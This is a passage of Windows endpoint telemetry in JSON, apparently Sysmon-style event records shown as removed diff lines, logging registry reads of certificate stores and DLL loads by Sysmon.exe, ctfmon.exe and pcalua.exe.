"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974170000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974330000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - 
"registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": 
"C:\\Windows\\System32\\WinTypes.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974480000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_value": "NameSpace", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dui70.dll", - "image_path": "C:\\Windows\\System32\\dui70.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974330000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": 
"C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974790000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - 
"image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
